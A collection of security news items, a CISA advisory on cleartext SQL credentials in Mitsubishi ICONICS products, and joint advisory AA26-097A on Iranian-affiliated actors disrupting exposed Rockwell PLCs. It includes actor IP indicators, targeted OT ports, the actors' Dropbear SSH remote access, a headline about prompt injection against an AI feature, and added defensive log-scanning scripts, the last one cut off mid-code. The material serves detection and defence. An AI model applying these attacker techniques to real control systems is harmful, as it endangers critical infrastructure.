Discovery used to be the bottleneck for open source bugs, but with automated discovery, remediation's the bottleneck, which bounties don't fund.

Iranian Threat Actors Disrupt US Critical Infrastructure via Exposed PLCs

Attackers compromised Internet-facing OT devices and caused file and display manipulation, operational disruption, and financial losses across sectors.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-1340 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Mozilla Thunderbird is an email client. Mozilla Thunderbird ESR is a version of the email client intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Storm-1175 Deploys Medusa Ransomware at 'High Velocity'

Microsoft says the financially motivated cybercrime group has exploited n-day and zero-day vulnerabilities in campaigns predicated on speed.

Grafana Patches AI Bug That Could Have Leaked User Data

By hiding malicious instructions on an attacker-controlled Web page, AI could ingest orders that appear benign but return sensitive data to the attacker's server.

Russia Hacked Routers to Steal Microsoft Office Tokens

Hackers linked to Russia's military intelligence units are using known flaws in older Internet routers to mass harvest authentication tokens from Microsoft Office users, security experts warned today. The spying campaign allowed state-backed Russian hackers to quietly siphon authentication tokens from users on more than 18,000 networks without deploying any malicious software or code.

Why Your Automated Pentesting Tool Just Hit a Wall

Automated pentesting tools deliver strong early results, then quickly plateau. Picus Security explains how the "PoC cliff" leaves major attack surfaces untested and creates a dangerous validation gap. [...]

Mitsubishi Electric GENESIS64 and ICONICS Suite products

Summary
Successful exploitation of these vulnerabilities could allow a local attacker to disclose SQL Server credentials used by the affected products and use them to disclose, tamper with, or destroy data, or to cause a denial-of-service (DoS) condition on the system. Both issues only arise when SQL authentication (rather than Windows authentication) is used for the SQL Server connection.

Affected versions (both CVE-2025-14815 and CVE-2025-14816):
GENESIS64 <=10.97.3
ICONICS Suite <=10.97.3
MobileHMI <=10.97.3
Hyper Historian <=10.97.3
AnalytiX <=10.97.3
MC Works64 (all versions)
GENESIS <=11.02
CVSS v3.1 base score: 8.8 (High) for each, vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Vendor: Mitsubishi Electric (products are also listed under Mitsubishi Electric Iconics Digital Solutions)
Equipment: GENESIS64 and ICONICS Suite products
Vulnerabilities: Cleartext Storage of Sensitive Information (CWE-312); Cleartext Storage of Sensitive Information in GUI (CWE-317)

Background
Critical infrastructure sectors: Critical Manufacturing
Countries/areas deployed: Worldwide
Company headquarters location: Japan, United States

Vulnerabilities
CVE-2025-14815 (CWE-312, Cleartext Storage of Sensitive Information): When the local caching feature using SQLite is enabled and SQL authentication is used for the SQL Server authentication, the SQL Server credentials are stored in plaintext within the local SQLite file. This may lead to information disclosure, tampering, or denial of service.
CVE-2025-14816 (CWE-317, Cleartext Storage of Sensitive Information in GUI): In the Hyper Historian Splitter feature of the affected products, when SQL authentication is used for the SQL Server authentication, the SQL Server credentials are displayed in plaintext in the GUI. This may lead to information disclosure, tampering, or denial of service.
The vector is local, low-privileged, scope changed: any local user account on the HMI or historian host is enough to read the credentials, and what they unlock is the SQL Server, which is a separate system from the host where they were found.

Affected products (status: known affected; the same list is published under both Mitsubishi Electric and Mitsubishi Electric Iconics Digital Solutions)
GENESIS64: <=10.97.3
ICONICS Suite: <=10.97.3
MobileHMI: <=10.97.3
Hyper Historian: <=10.97.3
AnalytiX: <=10.97.3
MC Works 64: all versions
GENESIS: <=11.02

Remediations
Vendor fix (GENESIS64, ICONICS Suite, MobileHMI, Hyper Historian, AnalytiX): Mitsubishi Electric and Mitsubishi Electric Iconics Digital Solutions are releasing fixed version 10.98 or later. Download the fixed version from https://iconicsinc.my.site.com/community/s/resource-center/product-downloads and install it. For CVE-2025-14815, after installation perform the following two steps: (1) in Workbench, open the "Configure Application(s) Settings" dialog and, in the "Available Applications" list, uncheck the "Local Cache" column for applications; (2) delete the files created by the local cache functionality from C:\ProgramData\ICONICS\Cache\*.sdf.
Vendor fix (GENESIS): Mitsubishi Electric and Mitsubishi Electric Iconics Digital Solutions are releasing fixed version 11.03 or later, available from the same download link. For CVE-2025-14815, after installation perform steps (1) and (2) above, deleting the cache files from C:\ProgramData\ICONICS\11\Cache\*.sqlite3 instead.
No fix planned (MC Works64): There are no plans to release a fixed version for MC Works64. Users of MC Works64 should refer to the Mitsubishi Electric security advisory and take the actions described there.
For more information on the fixed versions, refer to the Mitsubishi Electric security advisory at https://www.mitsubishielectric.co.jp/psirt/vulnerability/pdf/2025-023.pdf and the Mitsubishi Electric Iconics Digital Solutions whitepaper on security vulnerabilities at https://iconics.com/about/security/cert.

Mitigations for customers of products that do not have a fixed version or who cannot immediately update
For CVE-2025-14815: perform steps (1) and (2) above, in that order, since deleting the cache files only helps once the Local Cache feature is off. GENESIS64, ICONICS Suite, MobileHMI, Hyper Historian, AnalytiX and MC Works 64 use C:\ProgramData\ICONICS\Cache\*.sdf; GENESIS uses C:\ProgramData\ICONICS\11\Cache\*.sqlite3.
For CVE-2025-14816: (1) change the permissions of HHSplitter.exe so that only trusted administrators can execute it; (2) delete HHSplitter.exe from the system if it is unnecessary.
For both: use Windows authentication instead of SQL authentication for the SQL Server authentication method, which removes the stored and displayed credentials altogether; configure the PCs with the affected product installed so that only an administrator can log in; use those PCs in the LAN and block remote login from untrusted networks and hosts and from non-administrator users; block unauthorized access by using a firewall, virtual private network (VPN), etc., and allow remote login only to administrators when internet access is required; restrict physical access to the PC with the affected product installed and to the network to which it is connected; prevent users from clicking on web links in emails from untrusted sources or opening attachments in untrusted emails.

Metrics
CVE-2025-14815: CVSS v3.1 8.8 (High), CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVE-2025-14816: CVSS v3.1 8.8 (High), CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Acknowledgments
Mitsubishi Electric reported these vulnerabilities to CISA.

Legal notice and terms of use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities:
Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory conversion disclaimer
This ICSA is a verbatim republication of Mitsubishi Electric V20251021-001 and V20251029-001 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. It is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact CISA directly for any questions regarding this advisory.

Revision history
Initial release date: 2026-04-07
2026-04-07, revision 1: Initial publication
2026-04-07, revision 2: Initial CISA republication of the Mitsubishi Electric V20251021-001 and V20251029-001 advisories

Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure

Advisory at a glance
Title: Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure
Original publication: April 7, 2026

Executive summary
Iran-affiliated advanced persistent threat (APT) actors are conducting exploitation activity targeting internet-facing operational technology (OT) devices, including programmable logic controllers (PLCs) manufactured by Rockwell Automation/Allen-Bradley. This activity has led to PLC disruptions across several U.S. critical infrastructure sectors through malicious interactions with the project file and manipulation of data on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays, resulting in operational disruption and financial loss. U.S. organizations should urgently review the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the Mitigations section of this advisory to reduce the risk of compromise.

Affected products
Rockwell Automation/Allen-Bradley manufactured PLCs
Potentially other branded PLCs

Key actions
Remove PLCs from direct internet exposure via a secure gateway and firewall.
Query available logs for the provided IOCs in the corresponding time frames.
Check available logs for suspicious traffic on the ports associated with OT devices, including 44818, 2222, 102, and 502, especially traffic originating from overseas hosting providers.
For Rockwell Automation devices, place the physical mode switch on the controller into the RUN position (with the key in RUN the controller refuses remote project downloads and mode changes, which is what the observed project-file interactions depend on).
Contact the authoring agencies and Rockwell Automation for guidance if you believe your organization was targeted.

Indicators of compromise
For a downloadable copy of IOCs, see AA26-097A STIX XML (35 KB) and AA26-097A STIX JSON (12 KB).

Intended audience
Organizations: Critical infrastructure sectors Government Services and Facilities, Water and Wastewater Systems (WWS), and Energy
Roles: Defensive cybersecurity analysts, OT cybersecurity engineers, cybersecurity architects, secure systems developers

Introduction
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), Department of Energy (DOE), and United States Cyber Command Cyber National Mission Force (CNMF), hereafter referred to as the "authoring agencies," are urgently warning U.S. organizations of ongoing cyber exploitation of internet-connected operational technology (OT) devices, including Rockwell Automation/Allen-Bradley-manufactured programmable logic controllers (PLCs), across multiple U.S. critical infrastructure sectors. As a result of this activity, organizations from multiple U.S. critical infrastructure sectors experienced disruptions through malicious interactions with the project files[1] and the manipulation of data displayed on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays. In a few cases, this activity has resulted in operational disruption and financial loss. Due to the widespread use of these PLCs and the potential for additional targeting of other branded OT devices across critical infrastructure, the authoring agencies recommend U.S. organizations urgently review the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the Mitigations section to reduce the risk of compromise.
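The key actions ask for two log checks: any session reaching the OT protocol ports from outside the plant, and any session involving an address from the advisory's IOC list. The script below is an added example, not part of AA26-097A or tooling from the authoring agencies, of running both checks over exported firewall or flow logs. The key=value log line format, the internal address ranges and the single IOC address are constructed placeholders (the real IOCs are in the STIX bundle referenced above, and the port-to-protocol names are general knowledge, not taken from the advisory); substitute your own export format and the STIX indicators before use.

```python
"""Scan firewall/flow log exports for inbound sessions to OT protocol ports and
for IOC hits.  Added example, not from AA26-097A or the authoring agencies: the
log format, internal ranges and IOC placeholder below are constructed."""
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Ports named in the advisory's key actions, with the protocol that normally owns each.
OT_PORTS = {
    44818: "EtherNet/IP explicit messaging (CIP)",
    2222: "EtherNet/IP implicit I/O",
    102: "ISO-TSAP (Siemens S7)",
    502: "Modbus/TCP",
}

# Assumed: address ranges from which OT traffic is expected (plant and SCADA networks).
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Placeholder IOC in RFC 5737 documentation space; load the AA26-097A STIX IOCs here.
IOC_ADDRESSES = {ip_address("198.51.100.23")}

# Assumed key=value export shape; adjust the pattern to the real firewall format.
LOG_RE = re.compile(
    r"ts=(?P<ts>\S+) src=(?P<src>[\d.]+) spt=(?P<spt>\d+) "
    r"dst=(?P<dst>[\d.]+) dpt=(?P<dpt>\d+) proto=(?P<proto>\w+) action=(?P<action>\w+)"
)


def parse_line(line: str):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["spt"] = int(rec["spt"])
    rec["dpt"] = int(rec["dpt"])
    return rec


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_suspicious(lines):
    """Return (findings, per_source).

    findings: one dict per log line that either reaches an OT port from an
    external source or involves an IOC address, with a list of reasons.
    per_source: Counter of findings by source address, for triage ordering.
    """
    findings = []
    per_source = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; count these separately in production
        reasons = []
        if rec["dpt"] in OT_PORTS and not is_internal(rec["src"]):
            # an allowed session means the device really is reachable from outside
            note = " (allowed: device is externally reachable)" if rec["action"] == "allow" else ""
            reasons.append(f"external source to {OT_PORTS[rec['dpt']]} port {rec['dpt']}{note}")
        if ip_address(rec["src"]) in IOC_ADDRESSES or ip_address(rec["dst"]) in IOC_ADDRESSES:
            reasons.append("address matches IOC list")
        if reasons:
            findings.append({**rec, "reasons": reasons})
            per_source[rec["src"]] += 1
    return findings, per_source


# Constructed sample export, not from any real network.
SAMPLE_LOG = [
    "ts=2026-03-12T02:14:07Z src=10.20.5.7 spt=51022 dst=10.20.9.40 dpt=44818 proto=tcp action=allow",
    "ts=2026-03-12T02:15:33Z src=203.0.113.45 spt=40211 dst=10.20.9.40 dpt=44818 proto=tcp action=allow",
    "ts=2026-03-12T02:15:34Z src=203.0.113.45 spt=40212 dst=10.20.9.41 dpt=502 proto=tcp action=allow",
    "ts=2026-03-12T02:16:01Z src=198.51.100.23 spt=44000 dst=10.20.9.42 dpt=443 proto=tcp action=deny",
    "ts=2026-03-12T02:16:09Z src=203.0.113.45 spt=40213 dst=10.20.9.40 dpt=2222 proto=udp action=allow",
    "malformed line that the parser must skip",
]

if __name__ == "__main__":
    hits, by_src = find_suspicious(SAMPLE_LOG)
    for src, n in by_src.most_common():
        print(f"{src}: {n} finding(s)")
    for h in hits:
        print(h["ts"], h["src"], "->", f"{h['dst']}:{h['dpt']}", "; ".join(h["reasons"]))
```

The internal-range check is the part to get right for your site: an engineering laptop on a remote-access VPN pool will show up as external unless that pool is added, while a PLC answering on 44818 to an address in a hosting provider's range, with action=allow, is exactly the exposure the first key action tells you to remove.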
The authoring agencies assess a group of Iranian-affiliated advanced persistent threat (APT) actors is conducting this activity to cause disruptive effects within the United States. The group has targeted devices spanning multiple U.S. critical infrastructure sectors, including Government Services and Facilities (to include local municipalities), Water and Wastewater Systems (WWS), and Energy Sectors. The authoring agencies previously reported on similar activity targeting PLCs by CyberAv3ngers (aka Shahid Kaveh Group)—a cyber threat actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC) Cyber Electronic Command (CEC).  If owners and operators discover an affected internet-accessible device in their environment, additional technical measures may be necessary to evaluate the risk of compromise. Please contact the authoring agencies and applicable vendors through existing support channels available to customers and integrators (see Contact Information) to receive support, mitigation, and investigation assistance, and engage your cyber incident response plans. In addition to contacting the authoring agencies, organizations with Rockwell Automation/Allen-Bradley-manufactured PLCs should review the manufacturer’s previously issued guidance to strengthen the security of their operational technology deployments: PN1550 | CVE-2021-22681: Authentication Bypass Vulnerability Found in Logix Controllers, published in 2021, and SD1771 | Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet and Harden PLCs to Protect from Cyber Threats, published in 2026. Contact the Rockwell Automation Product Security Incident Response Team (PSIRT) at PSIRT@rockwellautomation.com for questions regarding this guidance, or to report cyber incidents related to Rockwell Automation products. For more information on Iranian malicious cyber activity, see CISA’s Iran Threat Overview and Advisories webpage and the FBI’s Iran Threat webpage. 
Download the PDF version of this report: Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure (PDF, 816.90 KB)

Background Information

Similar Historical Activity Targeting Programmable Logic Controllers

During a similar campaign beginning in November 2023, the IRGC CEC-affiliated cyber threat actors known as "CyberAv3ngers" targeted U.S.-based PLCs and HMIs, causing disruptive effects. Private industry and open sources also refer to this group as Hydro Kitten, Storm-0784, APT Iran, Bauxite, Mr. Soul, Soldiers of Solomon, UNC5691, and the Shahid Kaveh Group. These attacks compromised at least 75 devices, targeting U.S.-based Unitronics PLC devices with an HMI used across multiple critical infrastructure sectors, including WWS. For more information on this group's activity, see the authoring agencies' Joint Cybersecurity Advisory IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities.

Ongoing Threat Actor Activity Against U.S.-Based Programmable Logic Controllers

The FBI assesses that a group of Iranian-affiliated APT actors is targeting internet-exposed PLCs at U.S. critical infrastructure organizations with the intent to cause disruptions, including maliciously interacting with project files and manipulating data displayed on HMI and SCADA displays. Iranian-affiliated APT targeting campaigns against U.S. organizations have recently escalated, likely in response to hostilities between Iran and the United States and Israel.

Since at least March 2026, the authoring agencies have identified (through engagements with victim organizations) an Iranian-affiliated APT group that disrupted the function of PLCs. These PLCs were deployed across multiple U.S. critical infrastructure sectors (including Government Services and Facilities, WWS, and Energy) within a wide variety of industrial automation processes. Some of the victims experienced operational disruption and financial loss.

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. Technique IDs of the form T08xx (T0883, T0885) belong to the ATT&CK for ICS matrix; T1xxx IDs are Enterprise techniques. See the MITRE ATT&CK Tactics and Techniques section of this advisory for tables of the threat actors' activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

The authoring agencies observed Iranian-affiliated APT actors using several overseas-based IP addresses to access internet-facing Rockwell Automation/Allen-Bradley-manufactured PLCs [T0883]. The actors used leased, third-party hosted infrastructure running configuration software, such as Rockwell Automation's Studio 5000 Logix Designer, to establish an accepted connection to the victim's PLC. Targeted devices include CompactLogix and Micro850 PLC devices.

Command and Control

Inbound malicious traffic may be directed to devices on any of the following ports: 44818, 2222, 102, 22, or 502. (Port 44818, TCP and UDP, and port 2222/UDP carry EtherNet/IP, the CIP transport used by Rockwell Automation controllers; 102/TCP is ISO-TSAP, used by Siemens S7 communication; 502/TCP is Modbus/TCP; 22/TCP is SSH.) The targeting of ports [T0885] associated with other OT vendors' protocols suggests these actors may also be targeting devices manufactured by companies other than Rockwell Automation/Allen-Bradley, including the Siemens S7 PLC. Additionally, the actors deployed Dropbear Secure Shell (SSH) software on victim endpoints to enable remote access through port 22 [T1219].

Impact

The FBI identified that this activity resulted in the extraction of the device's project file and data manipulation on HMI and SCADA displays [T1565].

Indicators of Compromise

See Table 1 for recent IP addresses used by the Iranian-affiliated APT actors to communicate with Rockwell Automation/Allen-Bradley-manufactured devices (and potentially other branded OT devices) in the United States.

Disclaimer: The FBI observed that the threat actors used the IP addresses listed below in the specified time frames. This data is being provided for customers to query against logs for indications of historical targeting by the Iranian-affiliated APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

Table 1. Indicators of Compromise

Indicator          Beginning of Actor Association   End of Actor Association
135.136.1[.]133    March 2026                       March 2026
185.82.73[.]162    January 2025                     March 2026
185.82.73[.]164    January 2025                     March 2026
185.82.73[.]165    January 2025                     March 2026
185.82.73[.]167    January 2025                     March 2026
185.82.73[.]168    January 2025                     March 2026
185.82.73[.]170    January 2025                     March 2026
185.82.73[.]171    January 2025                     March 2026

MITRE ATT&CK Tactics and Techniques

See Table 2 to Table 4 for all referenced threat actor tactics and techniques in this advisory. The authoring agencies recommend organizations review historical TTPs for similar Iranian-affiliated cyber actor activity in IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK's Best Practices for MITRE ATT&CK Mapping and CISA's Decider Tool.

Table 2. Initial Access
Technique Title: Internet Accessible Device
ID: T0883
Use: The actors used Rockwell Automation's programming software (such as Studio 5000 Logix Designer) to access and interact with publicly exposed, internet-accessible PLCs installed and deployed without sufficient network and/or hardening security controls.

Table 3. Impact
Technique Title: Stored Data Manipulation
ID: T1565
Use: The actors maliciously interacted with project files and altered data displayed on HMI and SCADA displays.

Table 4. Command and Control
Technique Title: Commonly Used Port
ID: T0885
Use: The actors used commonly used OT ports to communicate with PLCs.

Technique Title: Remote Access Tools
ID: T1219
Use: The actors deployed Dropbear SSH software on victim endpoints to enable remote access through port 22.

Mitigations

The authoring agencies recommend organizations implement the mitigations below to improve their cybersecurity posture on the basis of the threat actors' activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals 2.0 (CPGs 2.0) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's CPG 2.0 webpage for more information on the CPGs, including additional recommended baseline protections.

Network Defenders

The cyber threat actors accessed Rockwell Automation/Allen-Bradley-manufactured PLCs to cause disruptions to victim systems. To safeguard against this threat and threats to other types of PLCs, the authoring agencies urge organizations to consider the following mitigations. In addition, organizations with these PLCs should review Rockwell Automation's guidance: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet and Harden PLCs to Protect from Cyber Threats.

Immediate steps to prevent the attack:
- Disconnect the PLC from the public-facing internet [CPG 3.S].
- Follow the joint guidance Secure connectivity principles for OT to safely allow remote access. Specifically, "remove inbound port exposure," so the OT system is never directly exposed to the internet or external networks, and ensure all access is mediated, monitored, and controlled.
  Do this through a secure gateway (jump host) that brokers the connection.
- Ensure cellular modems used for remote field connectivity and access are secured with strong authentication and kept updated. Enable logging on the connected modems to detect intrusion and improve incident response speed.
- For controllers with a physical mode switch, place the switch into the run position to prevent remote modification. Devices should only be in the program or remote position when updating or downloading software online, and should be switched back to the run position immediately afterward. (See Rockwell's System Security Design Guidelines [2] for the manufacturer's instructions.)
- For devices that allow software key switching, enable programming protection in the PLC configuration software (for Siemens S7, the Totally Integrated Automation [TIA] Portal) to limit who can modify PLCs remotely. (See Siemens' Cybersecurity for Industry Operational Guidelines for the manufacturer's instructions.)
- Create and test strong backups of the logic and configurations of PLCs. Store backup files offline and secure the physical removable media to enable fast recovery.

Follow-up steps to strengthen security posture:
- Implement multifactor authentication (MFA) [CPG 3.F] for access to the OT network from an external network. If remote access is required, implement a network proxy, gateway, firewall, and/or virtual private network (VPN) in front of the PLC to control network access. A VPN or gateway device can enforce MFA for remote access even if the PLC itself does not support MFA. Implement security rules on these higher-level network security mechanisms that prevent the repeated and sustained login attempts seen during a brute force attack.
- When possible, implement a device control list for workstations sending messages or connecting to OT components. Use the device control list to monitor logon activity for unexpected or unusual access to devices from the internet.
- Keep PLC devices updated with the latest software patches from the manufacturer. Use established downtime windows to install patches. Known Exploited Vulnerabilities may need to be prioritized outside a downtime window.
- Configure external and internal firewalls to block traffic on common ports associated with network protocols that are unnecessary for the particular network segment.
- Disable any unused authentication methods, logic, or features, such as default authentication keys, as well as unused or unneeded services such as Teletype Network (Telnet), File Transfer Protocol (FTP), Remote Desktop Protocol (RDP), Virtual Network Computing (VNC), and web services.
- Monitor asset management systems for device configuration changes, which can be used to understand expected parameter settings.
- Monitor the content of network traffic for the following:
  - Unusual logins to internet-connected devices or unexpected protocols to/from the internet.
  - Functions of industrial control systems (ICS) management protocols that change an asset's operating mode or modify programs.

In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, as well as reduce the impact and risk of compromise by cyber threat actors:
- Reduce risk exposure. CISA offers a range of services at no cost, including scanning and testing, to help organizations reduce exposure to threats by mitigating attack vectors. CISA's Cyber Hygiene Services can help provide additional review of organizations' internet-accessible assets.

Device Manufacturers

Note: The following guidance is general in nature and not specific to any OT vendor. Some of the features, settings, and practices may already be offered by certain vendors. The inclusion of this guidance should not be interpreted as an assertion that vendors referenced in this product do not offer such security features.
Although critical infrastructure organizations using PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products that are secure by design and default. The authoring agencies urge device manufacturers to take ownership of their customers' security outcomes by following the principles in the joint guide Secure by Demand: Priority Considerations for OT Owners and Operators when Selecting Digital Products, primarily:
- Change the manufacturers' default settings to prevent exposing administrative interfaces to the internet.
- Do not charge additional fees for basic security features needed to operate the product securely.
- Support MFA, including via phishing-resistant methods.

By using secure by design tactics, software manufacturers can make product lines secure "out of the box" without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. For more information on common misconfigurations and guidance on reducing their prevalence, see the joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. For more information on secure by design, see CISA's Secure by Design webpage and joint guide.

Validate Security Controls

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started:
1. Select an ATT&CK technique described in this advisory (see Table 2 to Table 4).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies' performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources
- Authoring Agencies: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities
- CISA: Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers
- EPA: Cybersecurity for the Water Sector
- CISA: Water and Wastewater Systems Sector
- CISA Alert: Exploitation of Unitronics PLCs used in Water and Wastewater Systems
- CISA: Iran Threat Overview and Advisories
- FBI: The Iran Threat
- CISA, MITRE: Best Practices for MITRE ATT&CK Mapping
- CISA: Decider Tool
- CISA: Cross-Sector Cybersecurity Performance Goals 2.0
- CISA: No-Cost Cybersecurity Services and Tools
- CISA: Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products
- NSA, CISA: NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations
- CISA: Secure by Design
- FBI: Primary Mitigations to Reduce Cyber Threats to Operational Technology
- United Kingdom National Cyber Security Centre: Secure connectivity principles for operational technology (OT)

Contact Information

U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:
- Contact CISA via CISA's 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-Say-CISA (1-844-729-2472), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
- For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.
- Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact EnergySRMA@hq.doe.gov.
- Contact the Rockwell Automation PSIRT at PSIRT@rockwellautomation.com for questions regarding their guidance or to report cyber incidents related to Rockwell Automation products.

Disclaimer

The information in this report is being provided "as is" for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.

Version History

April 7, 2026: Initial version.

Notes

[1] Project file refers to the software file that contains ladder logic and configuration settings. On Rockwell Automation devices, it is an .ACD file.
[2] See CompactLogix 5370 Controllers (Chapter 5: "Select the Operating Mode of the Controller") for more information on functions available for the switch.
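The Key Actions and Table 1 of the advisory above ask defenders to query logs for the listed IP addresses in their association time frames, to look for traffic on the OT ports (44818, 2222, 102, 502 and the SSH port 22 used by the deployed Dropbear), and to block the sustained login attempts a brute-force attack produces. The script below is an added example of that triage, written for this editorial pass; it is not part of AA26-097A and not vendor tooling. The log format (one key=value record per line), the sample log lines, the allowlist of hosts permitted to reach PLCs, and the repeated-attempt threshold are all constructed assumptions; the indicator list and windows are copied from Table 1.

```python
"""Triage perimeter/flow logs against the AA26-097A indicators and OT ports.

Added example for this advisory, not part of AA26-097A or any vendor tool.
Log lines are constructed key=value records.  The indicator list and
association windows are Table 1 of the advisory; the set of hosts allowed
to reach PLCs and the repeated-attempt threshold are assumptions.
"""
from collections import Counter
from datetime import datetime

# Table 1, re-fanged, with the actor-association window as (first, last) YYYY-MM.
IOC_WINDOWS = {
    "135.136.1.133": ("2026-03", "2026-03"),
    "185.82.73.162": ("2025-01", "2026-03"),
    "185.82.73.164": ("2025-01", "2026-03"),
    "185.82.73.165": ("2025-01", "2026-03"),
    "185.82.73.167": ("2025-01", "2026-03"),
    "185.82.73.168": ("2025-01", "2026-03"),
    "185.82.73.170": ("2025-01", "2026-03"),
    "185.82.73.171": ("2025-01", "2026-03"),
}

# Ports named in the advisory and the protocol normally behind each one.
OT_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
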